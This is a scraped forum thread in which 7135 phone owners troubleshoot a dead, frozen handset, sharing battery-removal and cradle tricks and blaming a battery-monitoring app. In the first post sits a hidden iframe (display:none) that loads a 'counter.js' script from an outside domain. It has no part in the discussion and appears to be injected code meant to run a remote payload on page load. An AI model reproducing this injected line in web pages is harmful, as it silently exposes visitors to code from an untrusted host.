+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Thread: Dead Phone!

Dead Phone!

Oh NO! Just when I thought I was so lucky to have a troublefree phone...

All I did was push the little button on the side to go from silent mode to ringer mode. I got a reverse negative screen and a freeze. No big deal. I push the soft reset. Open up the clam to a black screen. Hmmm. Try a hard reset. STILL a black screen!
    Take out the battery and put it back in. STILL a dead phone!! Put it in the cradle. NADA.

Oh nooooo! Now what do I do??:dunno :cryblue

The only thing I can think to blame it on is Battery Log which I installed a few hours ago.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Take the battery out for an hour to be sure. Mine did a spontaneous hard reset today when the battery ran out (no on screen notification either)....

Originally posted by michael1
    Take the battery out for an hour to be sure. Mine did a spontaneous hard reset today when the battery ran out (no on screen notification either)....
    Woah. I won't be pushing my battery any more! I ran it for about an hour and a half of light Palm use tonight after it started warning me of low battery, never again if that's what'll happen once it actually dies. Thanks for sharing your experiences.
    Sorry, but I no longer make 7135 headset adapters.

Ok, that was scary!! But its ok now. The trick was to put it in the cradle WITH NO BATTERY. That started a hard reset. Everything is fine now.

Originally posted by jazmaan
    Ok, that was scary!! But its ok now. The trick was to put it in the cradle WITH NO BATTERY. That started a hard reset. Everything is fine now.

Good to hear you got it going again! That's another tip I'll have to stash in the emergency bag! I'm learning so much here!
    Sorry, but I no longer make 7135 headset adapters.

I never would have thought to do that. How'd you get to be so smart?
    David

Glad to hear that your family emergency came out just fine. Way to find a solution. Congrats!
    ~'kito
    pdaPhoneHome Moderator

That happened to me--

That is similar to what happened to me---I sent it back. Never thought to try what you did--

SWC

Jazmann - Did you simply put it in the cradle (with AC connected) without battery and a hard reset happenned automatically or did you have to push the sync button?

Just put it in the cradle with no battery. By the way, I am 90% certain that my problems were caused by the application BATTERY LOG. Stay away from it!!

I wonder if Battery Log might have caused an accelerated drain on the battery, causing the phone to die, and making resets irrelevant until the phone was placed in the cradle. That would explain everything except why it was necessary to remove the battery before putting it in the cradle.

One more seemingly related problem. After successfully reviving my 7135, the next time I went to do a Hotsync I got a blank white screen, then errors saying the com port was in use or the computer was not communicating. Finally I had to reinstall the Palm Desktop for Windows. Now everything's ok.

poked back in
    Which Battery program is it? I remember one I tried drained my battery by a large amount because of some stupid algorithim. I avoid all of them now.

Curiosity killed the 7135. I couldn't resist installing Battery Log one more time just to test my hypothesis. Sure enough, within 4 hours I had a dead battery again! Do NOT use BATTERY LOG!

Administrator
    Curiosity killed the 7135. I couldn't resist installing Battery Log one more time just to test my hypothesis. Sure enough, within 4 hours I had a dead battery again! Do NOT use BATTERY LOG!
    this should go in the "Apps that dont work,,," thread,,,

Originally posted by marctronixx
    this should go in the "Apps that dont work,,," thread,,,
    I already posted about it there.

Alan

it happened to me too

Whoa - that was scary. The exact same thing happened to me as in the first post in this thread. Once the screen went dark (complete loss of power on the unit), I put the phone into the cradle without the battery, but still the screen was still dark. After leaving the battery out of the phone for a few minutes, I put in a recharged battery, and it came back to life (but it had been hard reset).

I did not have Battery Log installed. No SD card was in the phone. The battery life indicator on the phone had only one bar. (It was fully recharged this morning.) Needless to say, I am concerned about the quality of this unit and its battery life.

When was the last time you had used the phone prior to the discharge? What program were you using? Some programs, (Tealmovie Player for instance) don't stop even when you shut the clamshell. Perhaps something like that caused the discharge.

It happened again this morning and yesterday morning. I opened the phone, and it was displaying the time. It had not been running any applications. The battery still had a good charge on it (3 bars). I pressed the Datebook button (the silver button on the left), and the screen went into inverse video and locked up. Fortunately, this time a soft reset worked fine.

Looks like I joined the club. This happened to me and W...O...W
    is it scarey.. I was trying to get my dialup connection to work using an Earthlink dialup number vs. QNC. I'm was (and still are) having problems getting a connection to work and was using the PDA Network Prefs to try different combinations when all of sudden..wham I get the inverse screen. Having had it before I figured I'd just hit the "reset" button. No way. The screen went blank and I panicked. First I tried a different battery. Nothing. Then I tried a hard reset (which by the way you need pretty good dexterity to accomplish, sheez). Still Nothing. Then I went to our faithful web site. Typed DEAD into search and viola. Low and behold someones already had this. I read and tried. First I put it in the cradle without the battery as someone had successfully done. Nothing. Then I read a little further and several people said they left the battery out for a while (5 to 10 mins. is what I did) and then re-inserted it. Wheew.......... It worked. It started up again, (soft reset screen) then after all the usual prompts it gave me a "Routine Maintainence is taking place" message (which I've never seen before. It not appears to be okay.... This is totally bizzare.

Summary.

1. I have no idea why this happened.
    2. I don not have Battery Scope on my system
    3. I really don't like how the battery seats into the compartment. It's like just sitting there, not really snug or anything. In fact as I was putting in a different battery I swear I could hear like little electronic pops and things. (scarey)
    4. Leaving the battery out must discharge some memory chip, resistor, capacitor or something so it can start again. (electrical engineer I'm not)
    4. This board can definitely save your arse when there seems like nowhere to go.
    5. Search does work.....